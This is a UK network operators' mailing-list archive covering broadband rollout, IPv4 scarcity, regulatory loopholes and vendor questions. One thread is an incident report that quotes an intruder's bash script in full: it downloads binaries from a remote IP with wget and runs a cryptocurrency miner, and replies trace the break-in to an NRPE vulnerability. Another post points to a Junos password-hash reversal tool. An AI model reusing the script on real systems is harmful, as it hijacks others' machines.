Thanks Brendan and all. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP®? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC roll out logic?
On 4 Jun 2015 11:16, boggits bogg...@gmail.com wrote: On 4 June 2015 at 11:00, Gavin Henry ghe...@suretec.co.uk wrote: How does this selection process for upgrading exchanges get decided?!? Some have posited the following 1. Money - upgrade locations where there is business case in terms of density of end users with available cash to spend 2. Market Protection - Upgrade where VM have coverage, where other 3rd parties are deploying their solution and at the same time don't upgrade business areas (unless you have to) to stop Ethernet losses 3. Politics - because either someone is paying you to do the work or its the only way to shut someone up But isn't it Openreach doing these? Are the rollout plans given to Ofcom and justified to Ofcom? That's their job to oversee this. When will the minimum legal of 2mb/s access get increased?
Re: [uknof] FTTC roll out logic?
A big office might be on an exchange only line without a PCP (Primary Connection Point / green cabinet) to put an FTTC cabinet next to. BT Openreach claim to be working on a solution for EO lines. I'm not sure what it will be or when it might happen. Ah, that makes more sense now. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] FTTC roll out logic?
On 4 June 2015 at 11:28, Neil J. McRae n...@domino.org wrote: The NGA roll out is focused on the consumer market and return. I suspect your location would have been delivered under one of the rural extension schemes which I think would be HIE in your area. See my slides at -2 Uknofs for the wider build picture in Scotland. Thanks Neil. Yes, they were very interesting! -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Sanity check: Houston/US PoP
Hi all, We're thinking about expanding our network to Houston as all of our Aberdeen based Oil and Gas customers have an office there and they are asking about options. This will obviously allow US originated hosted VoIP traffic to stay there and other benefits. Correct me if I've completely got this wrong but this would mean: * colo or our own rack space there * our normal routing, switching and server kit * address space to announce from ARIN via transit (so we can offer public services there too) * obviously backhaul to our THE PoP, which we can then dish traffic out to our other PoP's * Peering (which I understand not to be as easy and open as here?) * US SIP carrier or TDM interconnect for breakout (we could use Level3 for some of that as we use them here for transit) Who do you recommend working with in Houston for this as I'm certain others have this already on the list? What blindly obvious thing have I forgotten at this time of night? Thanks (AS199659) -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http http://www.suretecgroup.com/0x8CFBA8E6.gpg:// http://www.suretecgroup.com/0x8CFBA8E6.gpgwww.suretecgroup.com http://www.suretecgroup.com/0x8CFBA8E6.gpg/0x8CFBA8E6. http://www.suretecgroup.com/0x8CFBA8E6.gpggpg http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] The operator's operator
Bogons can do all of the above :) The problem with FTTC from a small provider (like us) is that the per-Mbps we get charged by the wholesalers means we can't offer unlimited usage like the big players can (who depend on 75% of their users barely using it at all). As long as you're not taking the p*ss, we're reasonably tolerant. We're the same. We use TTB LLU's for unlimited products (fixed cost across the TTB network from the CPE to our NNI's) and BTW for the FTTC stuff (but only for busienss traffic). Although looking at TTB EoFTTC products too. We go through an aggregator for this. On BT WBC do you get charged 95th for traffic from the CPE to your NNI or do you pay for a big pipe? Using our BTW account I've downloaded their WBC and WBMC price lists and I've never seen anything like it! The xls is mental. Nothing like the SIP one. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk
Re: [uknof] The operator's operator
On 23 March 2015 at 20:25, Rod Beck rod.b...@hibernianetworks.com wrote: Watch the feeding frenzy and I thought 10 gig waves were competitive. I will stick to my niche. :) My email wasn't an offer, just a question :-)
[uknof] BT Calypso 999 Emergency File Format (EFF 999) and Openreach EMP XML API Open source libs
Evening all, As far as I can tell I've not seen anything open source for this. We have had permission to put our implementation out that we use. It will go on the CPAN sometime this month and github (Text::EFF999). We're about to start the same for Openreach EMP integration. Not sure if we'll be allowed to open source any code yet (or a suitable license). Conf call with Openreach tomorrow morning re discussion around service establishment for EAD, LLU and WLR3. Therefore, our work will only involve those three products but at least the framework will be there once. If we come across anything during our SS7 interconnect work we'll do the same. We're great believers in open source (as it powers all of our services and we contribute where we can) and wanted to know if other network/telco devs/devops etc. would be willing to look over this code and contribute, when ready, via github and/or similar? No dates yet. I just hate the fact that the 999 stuff is getting done again and again by us all and the few Openreach XML API consumers out there controlling who you have to go to if you want to use a web gui. Thanks, Gavin. Disclaimer: Since we've not had our first call with Openreach yet, I may have got this all wrong and it may not happen. -- http://www.surevoip.co.uk
Re: [uknof] Smartoptics still around?
Thanks. I actually had FlexOptix in my basic too. -- Kind Regards, Gavin Henry. On 20 Dec 2014 21:17, Joseph Waite joeli...@hannontelecom.net wrote: I'm just getting page won't load. I don't use them as I find http://www.solid-optics.com/ cheaper. There based in Netherlands but ship next day and I'm pretty sure they don't charge postage. They also now offer a re-coding box to re-code their optics. Regards Joe Waite On 20 Dec 2014, at 20:49, Gavin Henry ghe...@suretec.co.uk wrote: Anyone else's getting this 508? -- Kind Regards, Gavin Henry. Screenshot_2014-12-20-20-29-41.png
Re: [uknof] Smartoptics still around?
On 20 Dec 2014 21:38, Fearghas McKay fearg...@gmail.com wrote: On 20 Dec 2014, at 21:17, Joseph Waite joeli...@hannontelecom.net wrote: I'm just getting page won't load. I don't use them as I find http://www.solid-optics.com/ cheaper. There based in Netherlands but ship next day and I'm pretty sure they don't charge postage. They also now offer a re-coding box to re-code their optics. Their box only does SFP/+ and XFP, no QSFP. I've already ordered FlexOptix, but it seems our vendors supplier only supports SmartOptics. BTW, is V3 new as we have a re-enconder unit already from you. -- Kind Regards, Gavin Henry.
Re: [uknof] Edinburgh leased lines
Hi Martin, Take a look at https://www.connectionvouchers.co.uk/ to cover any install costs. Edinburgh is covered. Thanks.
Re: [uknof] High Density Wifi
I wonder what these guys are using? Not as high density as what you want to do I'm sure. Just announced in our home city: http://www.publiccontractsscotland.gov.uk/search/show/Search_View.aspx?id=DEC194619 by http://www.pinaclsolutions.com/aberdeen-wifi Free public WiFi will soon be available across 24 publicly accessible council properties in Aberdeen, as part of the latest work to be delivered by the Accelerate Aberdeen programme. Gavin.
Re: [uknof] High Density Wifi
On 10 December 2014 at 20:40, Rod Beck rod.b...@hibernianetworks.com wrote: Does anyone think that free WIFI in public places actually builds the Digital Economy? I tend to think this is just feel good politics. I travel, and yes, it is useful to have free access. But ... It's certainly free to the public but the public have paid for it. Just look at the contract value on that link. -- Kind Regards, Gavin Henry.
[uknof] Link from THE to THN?
Evening all, Can anyone offer me a link from TFM61 in THE across to BT's NAP in THN? Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
On 20 October 2014 09:03, Adrian Kennard uk...@e.gg wrote: On 05/09/14 11:47, Gavin Henry wrote: 2. Ofcom - with the newish charges per number range per year, for area codes that are classified as scarce, at £0.50 you get a £0.20~ discount on numbers ported out to another company. Upon a customer sign up for a telephone number in a scarce area, immediately port it to another Ltd company you own and receive your £0.20 per number per year discount. We are doing this - separate company handles the ported numbers and wholesales them back to us. So far OFCOM have accepted the discount claim, but failed actually get the bills right. Once the billing is all sorted, we will be in a position of wanting to encourage more number take up in conservation areas, as we only get the discount on ported numbers and only actual in-use numbers can be ported. This commercial incentive to us is the exact opposite of OFCOMs intentions. Thanks Adrian. Yeah, seems nothing wrong with 1 or 2 I've mentioned then. Gavin. -- Kind Regards, Gavin Henry.
Re: [uknof] UK IPv6 Taskforce
Now, only one of these groups is really feeling the pain of address depletion, and that's the access ISPs(2). Some feel that pain badly, and it's certainly true that there's no way you could enter the market as an access ISP in the UK given a /22 of address space. You can if you're selling access to your own services and you're dual stack. This allows you to run the CPE side in IPv6 only, but then you're possibly a content provider selling access to your own content?? :-) -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
On 5 September 2014 07:51, Neil J. McRae n...@domino.org wrote: Hmm! Unfortunately that sounds like a made up imaginary world though! :) Or is someone actually doing this (and have more than 75k customers were the /23 would give challenges)? We're doing it, but don't have 75k customers :-( -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
On 5 September 2014 08:31, Neil J. McRae n...@domino.org wrote: On 05/09/2014 08:15, Gavin Henry ghe...@suretec.co.uk wrote: On 5 September 2014 07:51, Neil J. McRae n...@domino.org wrote: Hmm! Unfortunately that sounds like a made up imaginary world though! :) Or is someone actually doing this (and have more than 75k customers were the /23 would give challenges)? We're doing it, but don't have 75k customers :-( So no Internet access at all, just to your own content? That's right, but just for VoIP Only access. The content being a SIP or Video call on Hosted VoIP/DDI etc. It means we can actually keep a VoIP only access circuit really low priced. There is more to do for clever folks using IPv6 to IPv4 tunnels etc. but it's a good start rather than going out and paying ~£10 ex VAT per IP address on a /22 above the /22 you get as an LIR (buying a failing ISP may be cheaper for /22 at the moment). But saying that, there are still plenty IPv4 out there to buy if we need to which wouldn't take more than 1-2 months billing to make a return. Gavin. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] UK IPv6 Taskforce
/22 ? http://www.ripe.net/ripe/policies/proposals/2014-01 Sorry, when we got our LIR status that is. Even tougher now. Either need to buy them or buy someone. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
Hi all, Thinking about this, as I know it's being done but wanted others opinions on it and wondered what RIPE and Ofcom are doing about it or if they care: 1. RIPE - start a new Ltd company, pay your 2000 Euros to RIPE and get a /22 with no ASN. Transfer that back to your existing company for free. Saves paying £10~ per IPv4 address for a /22 on the open market. Or do this and add to your IP brokerage company so you can sell them. Various issues but folks are doing it. 2. Ofcom - with the newish charges per number range per year, for area codes that are classified as scarce, at £0.50 you get a £0.20~ discount on numbers ported out to another company. Upon a customer sign up for a telephone number in a scarce area, immediately port it to another Ltd company you own and receive your £0.20 per number per year discount. Thoughts? For me it's one of those things that should be very easily spotted and stopped, but does the blame lay with the schemes in general? Thanks, Gavin. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE
On 5 September 2014 11:50, Neil J. McRae n...@domino.org wrote: On 05/09/2014 11:47, Gavin Henry ghe...@suretec.co.uk wrote: Thoughts? For me it's one of those things that should be very easily spotted and stopped, but does the blame lay with the schemes in general? You can¹t please all of the people all of the time. Yep, that's where I got to. Didn't want to come across ranty. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Automatic / Zero Touch Device Configuration
You need your own API James :) -- Kind Regards, Gavin Henry.
Re: [uknof] Wanted: BT TDM Interconnect SS7 Switch
Hi Joe, This is legit as we (SureVoIP) were looking too: http://uk.businessesforsale.com/uk/UK-SS7-Telecoms-Interconnect-Business-For-Sale.aspx Thanks.
Re: [uknof] DNS global issue?
BT IP Exchange is down due to this too. Can't get through to IPX help desk since 09:20. They do have a message on there saying something is up.
Re: [uknof] DNS global issue?
Alerting has detected it's back.
Re: [uknof] Thus box - fibre?
Thanks all. Will let you know how I get on. The only thing on the front is a small lable that looks too short to be a unique ID. I'll got back in the morning and trace into the loft. Gavin.
[uknof] decrypting Junos authentication-keys
Hi all, Just a quick one if you misplace the password you've used for an authentication key, if you use: http://securityxploded.com/juniper-password-decryptor.php and paste your $9 prefixed hash, it instantly shows your password. One we forgot to document was revealed like this. That tool comes with a virus (wajam_validate.exe installer) so run via wine on Linux/Mac as it fails to install, or on a throw away VM. Thanks. -- Kind Regards, Gavin Henry. http://www.surevoip.co.uk
Re: [uknof] 3rd party remote hands in Telehouse
What's up with Telehouse remote hands? Never and an issue with quality of work. Cost? Gavin.
Re: [uknof] 3rd party remote hands in Telehouse
Actually, quality of work is poor - if done in tandem with their cabling, We've had problems with cables runs and fibre having it's cladding bursting out once. they produce a rats nest and subsequently knock cables out when working in a busy rack or bend fibre beyond their bend radius limit. A big chunk of this is they don't know how to manage structured cabling. Prior to their policy changed we used 3rd parties for all the works and they maintained nicely groomed cable trays and ran patching neatly. Not had to do too much of this as yet. If I was regularly needing work carrying out on a non emergency basis I would outsource. The contractors I used to use have got other jobs now so I don't know who to suggest but this list ought to have some ideas... It's pretty disappointing if this is true and not raised with them to rectify given the prices paid. -- Kind Regards, Gavin Henry.
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
On 21 Apr 2014 10:30, Paul Mansfield paul+uk...@mansfield.co.uk wrote: I'd still use the security setting if possible even if you think it's unnecessary... to avoid fat finger breakage. Yep, makes sense.
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
Hi Tom, Yeah, see this: http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability and this from a reply to the abuse email of the IP address range used: http://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/ Thanks. On 21 April 2014 16:04, Tom Storey t...@snnap.net wrote: Probably also worth making /tmp noexec so that stuff like this has a harder time getting started. On 20 April 2014 20:14, Gary Steers g...@boosty.com wrote: All, This looks like its some form of crypto currency miner xptMiner.exe, think that ones a RieCoin one... Undoubtedly the servers in use are compromised in some way but may be worth an abuse message to the contact on the RIR record in whois? Gavin, have sent you an e-mail off topic as well with a little more info, hope it was useful. --- Gary Steers Chief Network Engineer | Boosty On 20 April 2014 19:56, Gavin Henry ghe...@suretec.co.uk wrote: Hi all, Not usually a post you see on uknof, but wanted some help and to check if anyone else has seen this? We've just started getting alerts from one of our servers for highload and discovered a weird process: nagios285936 0.0 0.0 10744 1468 ?S19:03 0:00 bash /tmp/toplel nagios292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752 root@hostname:/tmp# ls -lh total 1016K -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 l -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t No idea where it came from. All our stuff has OpenSSL updated as is our Nagios. w00t is a binary, toplel is a bash script containing: #!/bin/bash if [ $1 -le 10 ] ; then NUM = $(expr $1 + 1) nohup bash $0 $NUM /dev/null 21 exit fi CORECOUNT=$(cat /proc/cpuinfo | grep -c processor) FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}') FREE=$(expr $FREE - 52428800) FREE=$(expr $FREE / $CORECOUNT) while true; do killall w00t wget http://162.213.24.40/nope-sse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE wget http://162.213.24.40/nope-nse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE sleep 300 done; -- Kind Regards, Gavin Henry. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
Hi all, Not usually a post you see on uknof, but wanted some help and to check if anyone else has seen this? We've just started getting alerts from one of our servers for highload and discovered a weird process: nagios285936 0.0 0.0 10744 1468 ?S19:03 0:00 bash /tmp/toplel nagios292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752 root@hostname:/tmp# ls -lh total 1016K -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 l -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t No idea where it came from. All our stuff has OpenSSL updated as is our Nagios. w00t is a binary, toplel is a bash script containing: #!/bin/bash if [ $1 -le 10 ] ; then NUM = $(expr $1 + 1) nohup bash $0 $NUM /dev/null 21 exit fi CORECOUNT=$(cat /proc/cpuinfo | grep -c processor) FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}') FREE=$(expr $FREE - 52428800) FREE=$(expr $FREE / $CORECOUNT) while true; do killall w00t wget http://162.213.24.40/nope-sse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE wget http://162.213.24.40/nope-nse4 -O /tmp/w00t chmod 777 /tmp/w00t /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE sleep 300 done; -- Kind Regards, Gavin Henry.
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
Not seen it but have seen variants reported - that's a coin miner of some sort (-u username -p password - the fact it's looking for RAM available etc suggests probably Scrypt-based). The IP it's targeting is a pool called YPool. Might be worth reporting this to the pool and/or the host of the file (company called VolumeDrive apparently). Thanks. I've discovered this now. Are you running any Nagios extensions that run as servers? Are you using nrpe/is it locked down in your firewall to only accept your Nagios host? All locked down, but checking. We use Opsview Pro so are raising a ticket with them too as there are no opsview-agent/nrpe updates that we haven't applied. Gavin. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
Hi Paul, Yep, just seen and issue was a badly configured iptables on this VM leaving port 5666 open to the world with accept args on in nrpe.cfg for Opsview-agent (their stock one). So usual human error. Cheers all! On 20 April 2014 21:14, Paul Mansfield p...@mansfield.co.uk wrote: looks like you've been hit by the nagios nrpe vulnerability: http://seclists.org/fulldisclosure/2014/Apr/240 basically it's possible to feed NRPE with additional commands because NRPE doesn't block newlines when it cleans up input. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel
So usual human error. ah, oh dear :-( sadly you're probably far from the only one. does allowed_hosts in nrpe.cfg not stop the vulnerability? Hi Paul, Probably, but it's normally firewalled off and not run that way. Thanks.
Re: [uknof] Possible Prefix Hijack - BGPmon alert - what to do?
Thanks all. Thought I'd check with those who know more than me :-) Gav. -- Kind Regards, Gavin Henry.
Re: [uknof] Offsite storage
Hi all, Thanks for all the offlist replies. To clarify, it's 1Tb I'm looking for with the data saved outside Telehouse, as that's where we are. Gavin. On 31 January 2014 10:30, Gavin Henry ghe...@suretec.co.uk wrote: Hi all, Can anyone offer us some offsite storage that we can dump to via SSH/rsync? Preferably across LONAP. Thanks. Gavin -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
[uknof] Offsite storage
Hi all, Can anyone offer us some offsite storage that we can dump to via SSH/rsync? Preferably across LONAP. Thanks. Gavin
[uknof] Drop shipping CPE routers
Hi all, Any recommendations for companies that drop ship CPE routers pre-configured? Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Preferred legal firm
Hi Steve, We use Brodies for our Ofcom ones: http://www.surevoip.co.uk/about/terms-conditions They have a department for this. Not too pricey. Thanks. -- Kind Regards, Gavin Henry.
Re: [uknof] Drop shipping CPE routers
Thanks all! On the phone now with Netlynk. Gavin. On 20 January 2014 16:20, Matthew Hattersley matthew.hatters...@vaioni.com wrote: You might want a chat with http://www.netlynkdirect.com/. We’ve used them before, pretty good automation too. YMMV From: uknof [mailto:uknof-boun...@lists.uknof.org.uk] On Behalf Of Dave Wilson Sent: 20 January 2014 16:17 To: uknof@lists.uknof.org.uk Subject: Re: [uknof] Drop shipping CPE routers On 20 January 2014 11:42, Gavin Henry ghe...@suretec.co.uk wrote: Hi all, Any recommendations for companies that drop ship CPE routers pre-configured? I would also be interested in this. DW The information transmitted in and with this email is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Statements and opinions expressed in this e-mail may not represent those of the Company. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender immediately and delete the material from any computer. Please also note, Vaioni filter incoming email for spam and inappropriate words. Unfortunately this does mean that sometimes genuine messages can be filtered out. Although we take measures to recover such messages, it must not be assumed that an email has been received by us and important communications should always be followed up by a phone call, fax or printed copy. -- Kind Regards, Gavin Henry. Managing Director. T +44 (0) 1224 279484 M +44 (0) 7930 323266 F +44 (0) 1224 824887 E ghe...@suretec.co.uk Open Source. Open Solutions(tm). http://www.suretecsystems.com/ Suretec Systems is a limited company registered in Scotland. Registered number: SC258005. Registered office: 24 Cormack Park, Rothienorman, Inverurie, Aberdeenshire, AB51 8GL. Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html Do you know we have our own VoIP provider called SureVoIP? See http://www.surevoip.co.uk OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net or http://www.suretecgroup.com/0x8CFBA8E6.gpg
Re: [uknof] External monitoring of routes in to your network
On 15 December 2013 18:11, David Farrell da...@david-farrell.net wrote: On 15 Dec 2013, at 14:45, Gavin Henry ghe...@suretec.co.uk wrote: So we're monitoring everything possible inside our network but wondered what others do to check routes that come in to your network via transit for latency/pl etc.? With the mixture of transit and public peering, even on our startup network, it's something to think about the best way. Also, how far out do you monitor? Just to your BGP peers or some known point after that? It's not good just pinging some public service as I'm sure they won't like it. I hear Pingdom and others but not sure. Pingdom in use here. We monitor some key nodes that run BGP with it, and some other bits and pieces within our hosted services. We're thinking about using some VPS boxes around the globe to perhaps obtain different insights into how we appear to the rest of the world. David. Ok, thanks. I've got BGPMon and set up a NLNOG Ring too. Internal to outside monitoring is fine with Nagios (although looking at Opsview right now and Observium) and SmokePing. Mainly all SNMP with traps and Linux servers with NRPE. We have one external VM that we are adding to as it routes over LINX just now to us but want to check routes in via our two transit providers. -- Kind Regards, Gavin Henry.
Re: [uknof] External monitoring of routes in to your network
On 15 December 2013 23:50, Charlie Boisseau char...@fluency.net.uk wrote: Gavin, Hi Charlie, We’ve been working on this recently, so I can provide some insight here. Only recently? You're a good few years ahead of us :-) We use Pingdom and BGPmon at the moment for basic reachability tests but it’s very basic so we we are in the process of beefing it up, and have taken a pretty belt and braces approach: OK, cool. I set up BGPmon and noticed we're seeing AS-TRANS/AS23456 alerts. We’re replicating our internal monitoring (Nagios + Xymon) to an external VM hosted with Digital Ocean (but could easily be Amazon or similar). This will mean our monitoring servers will be monitored which gives us some extra piece of mind. It also means that we can host a status webpage for customers to access if we have a problem. Yep, same plan here. The status page is on a completely separate domain name hosted on external DNS servers, just in case we have a problem that affects DNS. We have integrated this to our broadcaster platform so that our admins can post an alert or maintenance window and it uses the Wordpress API to post it on the status page as well as emailing the affected customers as normal. I think that's the only sane way to present things to customers. Oh, your website is down so can't check the service status :-) We also have the monitoring servers using an SMS API (I’m sure you know the one) to send text alerts in case emails can’t reach us. The system sends me a ‘sanity’ text message every day at 6pm so we know even at quiet times that all is working correctly. Yep. same here. We also have a daily job to dial in to our OoB modem if all else fails :-) Ofcourse the on-net monitoring server will look out for the one hosted externally and visa-versa, so theoretically there would have to be multiple failures with both us and external parties for there to be a problem that we don’t know about. We need a NLNOG Ring for community monitoring. I don't know if NLNOG ring has alerts but will check as I just created the VM last night. -- Kind Regards, Gavin Henry.
Re: [uknof] External monitoring of routes in to your network
In a similar fashion, but with less hoop-jumping, there is the NLNOG Ring: https://ring.nlnog.net/ In short: donate a VPS or Server, gain access to all of the others. There are some neat tools there to be used. Job did a presentation on it at UKNOF19, a few years back: http://www.uknof.org.uk/uknof19/Snijders-RING.pdf Done. Looks great. Awaiting admins now. -- Kind Regards, Gavin Henry.
Re: [uknof] External monitoring of routes in to your network
Thanks, Gavin. Sorry for the massive sig! Forgot.
Re: [uknof] Messed up Telehouse cable run order - LC to SC adapters false economy?
However if your just driving the cross-connect I would suck up the loss get an LC-LC or SC-SC coupler from repsole as appropriate and then an LC-SC cable. I'm going to do this and save some money. Thanks!